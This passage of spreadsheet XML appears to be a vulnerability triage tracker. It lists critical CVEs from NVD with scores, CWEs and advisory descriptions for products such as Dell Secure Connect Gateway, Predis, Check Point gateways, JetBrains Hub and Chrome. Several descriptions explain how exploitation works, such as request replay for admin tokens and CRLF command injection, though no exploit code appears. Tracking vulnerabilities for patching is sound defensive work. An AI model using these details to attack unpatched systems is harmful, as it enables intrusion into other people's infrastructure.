      <c r="C46" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79689</t>
        </is>
      </c>
      <c r="D46" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E46" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F46" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G46" s="5" t="inlineStr"/>
      <c r="H46" s="5" t="n">
        <v>0.019</v>
      </c>
      <c r="I46" s="5" t="inlineStr"/>
      <c r="J46" s="5" t="inlineStr"/>
      <c r="K46" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L46" s="5" t="inlineStr"/>
      <c r="M46" s="5" t="inlineStr"/>
      <c r="N46" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O46" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P46" s="5" t="inlineStr"/>
      <c r="Q46" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R46" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to script injection.</t>
        </is>
      </c>
      <c r="S46" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79689</t>
        </is>
      </c>
    </row>
    <row r="47">
      <c r="A47" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B47" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C47" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79941</t>
        </is>
      </c>
      <c r="D47" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E47" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F47" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G47" s="5" t="inlineStr"/>
      <c r="H47" s="5" t="n">
        <v>0.019</v>
      </c>
      <c r="I47" s="5" t="inlineStr"/>
      <c r="J47" s="5" t="inlineStr"/>
      <c r="K47" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L47" s="5" t="inlineStr"/>
      <c r="M47" s="5" t="inlineStr"/>
      <c r="N47" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O47" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P47" s="5" t="inlineStr"/>
      <c r="Q47" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="R47"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S47" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79941</t>
        </is>
      </c>
    </row>
    <row r="48">
      <c r="A48" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B48" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C48" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80129</t>
        </is>
      </c>
      <c r="D48" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E48" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F48" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G48" s="5" t="inlineStr"/>
      <c r="H48" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I48" s="5" t="inlineStr"/>
      <c r="J48" s="5" t="inlineStr"/>
      <c r="K48" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L48" s="5" t="inlineStr"/>
      <c r="M48" s="5" t="inlineStr"/>
      <c r="N48" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O48" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P48" s="5" t="inlineStr"/>
      <c r="Q48" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R48"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S48" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80129</t>
        </is>
      </c>
    </row>
    <row r="49">
      <c r="A49" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B49" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C49" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80131</t>
        </is>
      </c>
      <c r="D49" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E49" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F49" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G49" s="5" t="inlineStr"/>
      <c r="H49" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I49" s="5" t="inlineStr"/>
      <c r="J49" s="5" t="inlineStr"/>
      <c r="K49" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L49" s="5" t="inlineStr"/>
      <c r="M49" s="5" t="inlineStr"/>
      <c r="N49" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O49" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P49" s="5" t="inlineStr"/>
      <c r="Q49" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R49"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S49" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80131</t>
        </is>
      </c>
    </row>
    <row r="50">
      <c r="A50" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B50" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C50" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80172</t>
        </is>
      </c>
      <c r="D50" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E50" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F50" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G50" s="5" t="inlineStr"/>
      <c r="H50" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I50" s="5" t="inlineStr"/>
      <c r="J50" s="5" t="inlineStr"/>
      <c r="K50" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L50" s="5" t="inlineStr"/>
      <c r="M50" s="5" t="inlineStr"/>
      <c r="N50" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O50" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P50" s="5" t="inlineStr"/>
      <c r="Q50" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="R50" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Insufficient Verification of Data Authenticity vulnerability. An unauthenticated attacker with remote access could exploit this, leading to unauthorized access. This vulnerability is considered critical as an unauthenticated attacker can repeatedly reuse a captured request to generate ADMIN access and refresh tokens. Since there is no nonce validation or time limit on requests, the attack can be performed indefinitely. Dell recommends customers to upgrade at the earliest opportunity</t>
        </is>
      </c>
      <c r="S50" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80172</t>
        </is>
      </c>
    </row>
    <row r="51">
      <c r="A51" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B51" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C51" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84372</t>
        </is>
      </c>
      <c r="D51" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E51" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F51" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G51" s="5" t="inlineStr"/>
      <c r="H51" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I51" s="5" t="inlineStr"/>
      <c r="J51" s="5" t="inlineStr">
        <is>
          <t>redis</t>
        </is>
      </c>
      <c r="K51" s="5" t="inlineStr"/>
      <c r="L51" s="5" t="inlineStr"/>
      <c r="M51" s="5" t="inlineStr"/>
      <c r="N51" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O51" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P51" s="5" t="inlineStr"/>
      <c r="Q51" s="5" t="inlineStr">
        <is>
          <t>CWE-93</t>
        </is>
      </c>
      <c r="R51" s="5" t="inlineStr">
        <is>
          <t>Predis is a flexible and feature-complete Redis and Valkey client for PHP. From version 3.0.0-RC1 until version 3.3.0, pipeline handling on aggregate cluster and replication connections reparses an already serialized RESP buffer in AbstractAggregateConnection::write() by splitting it with explode("\r\n") instead of honoring RESP length prefixes. Attacker-controlled keys or values containing CRLF sequences can therefore be interpreted by Command::deserializeCommand() as additional commands. On cluster connections, ClusterStrategy::getFakeKey() can route injected keyless commands using the literal fake key value "key", permitting operations such as shard-wide cache deletion, targeted data modification, data reads, or node disruption. On replication connections, malformed reparsing can throw an uncaught exception and repeatedly terminate affected requests. Only pipeline() reaches this vulnerable path; transaction() and MULTI are not affected. This issue is fixed in version 3.3.0.</t>
        </is>
      </c>
      <c r="S51" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84372</t>
        </is>
      </c>
    </row>
    <row r="52">
      <c r="A52" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B52" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C52" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85102</t>
        </is>
      </c>
      <c r="D52" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E52" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F52" s="5" t="inlineStr">
        <is>
          <t>cve@checkpoint.com</t>
        </is>
      </c>
      <c r="G52" s="5" t="inlineStr"/>
      <c r="H52" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I52" s="5" t="inlineStr"/>
      <c r="J52" s="5" t="inlineStr"/>
      <c r="K52" s="5" t="inlineStr"/>
      <c r="L52" s="5" t="inlineStr"/>
      <c r="M52" s="5" t="inlineStr"/>
      <c r="N52" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O52" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P52" s="5" t="inlineStr"/>
      <c r="Q52" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="R52" s="5" t="inlineStr">
        <is>
          <t>Improper certificate trust validation during VPN negotiation in Check Point Quantum Security Gateway may allow an unauthenticated remote attacker to execute arbitrary code on the Gateway.</t>
        </is>
      </c>
      <c r="S52" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85102</t>
        </is>
      </c>
    </row>
    <row r="53">
      <c r="A53" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B53" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C53" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85103</t>
        </is>
      </c>
      <c r="D53" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E53" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F53" s="5" t="inlineStr">
        <is>
          <t>cve@checkpoint.com</t>
        </is>
      </c>
      <c r="G53" s="5" t="inlineStr"/>
      <c r="H53" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I53" s="5" t="inlineStr"/>
      <c r="J53" s="5" t="inlineStr"/>
      <c r="K53" s="5" t="inlineStr"/>
      <c r="L53" s="5" t="inlineStr"/>
      <c r="M53" s="5" t="inlineStr"/>
      <c r="N53" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O53" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P53" s="5" t="inlineStr"/>
      <c r="Q53" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R53" s="5" t="inlineStr">
        <is>
          <t>A heap-based buffer overflow in VPN certificate ASN.1 decoding may allow an unauthenticated remote attacker to execute arbitrary code on Check Point Quantum Security Management and Quantum Security Gateway systems.</t>
        </is>
      </c>
      <c r="S53" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85103</t>
        </is>
      </c>
    </row>
    <row r="54">
      <c r="A54" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B54" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C54" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85506</t>
        </is>
      </c>
      <c r="D54" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E54" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F54" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G54" s="5" t="inlineStr"/>
      <c r="H54" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I54" s="5" t="inlineStr"/>
      <c r="J54" s="5" t="inlineStr"/>
      <c r="K54" s="5" t="inlineStr"/>
      <c r="L54" s="5" t="inlineStr"/>
      <c r="M54" s="5" t="inlineStr"/>
      <c r="N54" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O54" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P54" s="5" t="inlineStr"/>
      <c r="Q54" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R54" s="5" t="inlineStr">
        <is>
          <t>ipmi-oem in FreeIPMI before 1.6.19 has a stack-based buffer overflow in _get_dell_system_info_idrac_info in ipmi-oem/ipmi-oem-dell.c (idrac-info subcommand to dell get-system-info).</t>
        </is>
      </c>
      <c r="S54" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85506</t>
        </is>
      </c>
    </row>
    <row r="55">
      <c r="A55" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B55" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C55" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86478</t>
        </is>
      </c>
      <c r="D55" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E55" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F55" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G55" s="5" t="inlineStr"/>
      <c r="H55" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I55" s="5" t="inlineStr"/>
      <c r="J55" s="5" t="inlineStr"/>
      <c r="K55" s="5" t="inlineStr"/>
      <c r="L55" s="5" t="inlineStr"/>
      <c r="M55" s="5" t="inlineStr"/>
      <c r="N55" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O55" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P55" s="5" t="inlineStr"/>
      <c r="Q55" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="R55" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2025.3.161254, 
2026.1.14042 improper authentication in YouTrack Helpdesk allowed unauthenticated account takeover via a self-asserted email address</t>
        </is>
      </c>
      <c r="S55" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86478</t>
        </is>
      </c>
    </row>
    <row r="56">
      <c r="A56" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B56" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C56" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86480</t>
        </is>
      </c>
      <c r="D56" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E56" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F56" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G56" s="5" t="inlineStr"/>
      <c r="H56" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I56" s="5" t="inlineStr"/>
      <c r="J56" s="5" t="inlineStr"/>
      <c r="K56" s="5" t="inlineStr"/>
      <c r="L56" s="5" t="inlineStr"/>
      <c r="M56" s="5" t="inlineStr"/>
      <c r="N56" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O56" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P56" s="5" t="inlineStr"/>
      <c r="Q56" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R56" s="5" t="inlineStr">
        <is>
          <t>In JetBrains Hub before 2026.2.52442 an unauthenticated attacker could register a trusted service and gain superuser privileges</t>
        </is>
      </c>
      <c r="S56" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86480</t>
        </is>
      </c>
    </row>
    <row r="57">
      <c r="A57" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B57" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C57" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87534</t>
        </is>
      </c>
      <c r="D57" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E57" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F57" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G57" s="5" t="inlineStr"/>
      <c r="H57" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I57" s="5" t="inlineStr"/>
      <c r="J57" s="5" t="inlineStr"/>
      <c r="K57" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="L57" s="5" t="inlineStr"/>
      <c r="M57" s="5" t="inlineStr"/>
      <c r="N57" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O57" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P57" s="5" t="inlineStr"/>
      <c r="Q57" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R57" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in WebView in Google Chrome on on Android prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to bypass system access restrictions via crafted network traffic. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S57" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87534</t>
        </is>
      </c>
    </row>
    <row r="58">
      <c r="A58" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B58" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C58" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87544</t>
        </is>
      </c>
      <c r="D58" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E58" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F58" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G58" s="5" t="inlineStr"/>
      <c r="H58" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I58" s="5" t="inlineStr"/>
      <c r="J58" s="5" t="inlineStr"/>
      <c r="K58" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L58" s="5" t="inlineStr"/>
      <c r="M58" s="5" t="inlineStr"/>
      <c r="N58" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O58" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P58" s="5" t="inlineStr"/>
      <c r="Q58" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R58" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Extensions in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to bypass system access restrictions into a privileged page via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="S58" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87544</t>
        </is>
      </c>
    </row>
    <row r="59">
      <c r="A59" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B59" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C59" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87595</t>
        </is>
      </c>
      <c r="D59" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E59" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F59" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G59" s="5" t="inlineStr"/>
      <c r="H59" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I59" s="5" t="inlineStr"/>
      <c r="J59" s="5" t="inlineStr"/>
      <c r="K59" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L59" s="5" t="inlineStr"/>
      <c r="M59" s="5" t="inlineStr"/>
      <c r="N59" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O59" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P59" s="5" t="inlineStr"/>
      <c r="Q59" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R59" s="5" t="inlineStr">
        <is>
          <t>Server-side request forgery in Mobile in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to bypass system access restrictions via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="S59" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87595</t>
        </is>
      </c>
    </row>
    <row r="60">
      <c r="A60" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B60" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C60" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53649</t>
        </is>
      </c>
      <c r="D60" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E60" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F60" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G60" s="5" t="inlineStr"/>
      <c r="H60" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I60" s="5" t="inlineStr"/>
      <c r="J60" s="5" t="inlineStr"/>
      <c r="K60" s="5" t="inlineStr"/>
      <c r="L60" s="5" t="inlineStr"/>
      <c r="M60" s="5" t="inlineStr"/>
      <c r="N60" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O60" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P60" s="5" t="inlineStr"/>
      <c r="Q60" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-352, CWE-434, CWE-942</t>
        </is>
      </c>
      <c r="R60" s="5" t="inlineStr">
        <is>
          <t>Joro is a web exploitation framework. Prior to version 1.1.1, Joro's default proxy mode exposes a local API on 127.0.0.1:9090 that performs no authentication and applies a wildcard CORS policy. Because plugin uploads use the CORS-safelisted multipart/form-data content type, cross-origin JavaScript on any page the operator visits can reach privileged endpoints - including uploading a native plugin and triggering a restart - directly through the operator's browser, with no preflight or credentials. Since plugins execute on load, this yields unauthenticated remote code execution as the operator's user from a single page visit. This issue has been patched in version 1.1.1.</t>
        </is>
      </c>
      <c r="S60" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53649</t>
        </is>
      </c>
    </row>
    <row r="61">
      <c r="A61" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B61" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C61" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54523</t>
        </is>
      </c>
      <c r="D61" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E61" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F61" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G61" s="5" t="inlineStr"/>
      <c r="H61" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I61" s="5" t="inlineStr"/>
      <c r="J61" s="5" t="inlineStr"/>
      <c r="K61" s="5" t="inlineStr"/>
      <c r="L61" s="5" t="inlineStr"/>
      <c r="M61" s="5" t="inlineStr"/>
      <c r="N61" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O61" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P61" s="5" t="inlineStr"/>
      <c r="Q61" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R61" s="5" t="inlineStr">
        <is>
          <t>Kyverno is a policy engine designed for cloud native platform engineering teams. From 1.18.0 until 1.18.2, the NamespacedMutatingPolicy CEL compiler exposes the generator library to matchConditions, allowing a namespace-scoped policy to invoke generator.apply(namespace, resources) with an arbitrary target namespace. The validation in pkg/cel/policies/mpol/validate.go checks that the policy compiles but does not enforce namespace scope, and GenerateResources in pkg/cel/libs/context.go does not reject the cross-namespace target. A user who can create NamespacedMutatingPolicy objects in one namespace can cause the admission controller, operating with cluster-wide privileges, to create ConfigMaps, NetworkPolicies, Secrets, RoleBindings, and other resources in another namespace, enabling unauthorized modification and potential privilege escalation. This issue is fixed in version 1.18.2.</t>
        </is>
      </c>
      <c r="S61" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54523</t>
        </is>
      </c>
    </row>
    <row r="62">
      <c r="A62" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B62" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C62" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54694</t>
        </is>
      </c>
      <c r="D62" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E62" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F62" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G62" s="5" t="inlineStr"/>
      <c r="H62" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I62" s="5" t="inlineStr"/>
      <c r="J62" s="5" t="inlineStr"/>
      <c r="K62" s="5" t="inlineStr"/>
      <c r="L62" s="5" t="inlineStr"/>
      <c r="M62" s="5" t="inlineStr"/>
      <c r="N62" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O62" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P62" s="5" t="inlineStr"/>
      <c r="Q62" s="5" t="inlineStr">
        <is>
          <t>CWE-116, CWE-183, CWE-20, CWE-693, CWE-79</t>
        </is>
      </c>
      <c r="R62" s="5" t="inlineStr">
        <is>
